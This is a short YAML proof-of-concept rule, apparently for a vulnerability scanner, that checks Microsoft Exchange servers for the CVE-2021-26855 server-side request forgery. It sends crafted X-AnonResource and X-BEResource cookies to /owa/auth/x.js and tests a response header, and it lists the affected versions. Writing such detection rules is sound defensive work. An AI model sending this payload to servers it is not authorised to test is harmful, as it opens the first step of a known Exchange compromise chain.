name: poc-yaml-exchange-cve-2021-26855-ssrf
rules:
  - method: GET
    path: /owa/auth/x.js
    headers:
      Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
    follow_redirects: false
    expression: |
      response.headers["X-CalculatedBETarget"].icontains("localhost")
detail:
  author: sharecast
  Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010"
  links:
    - https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse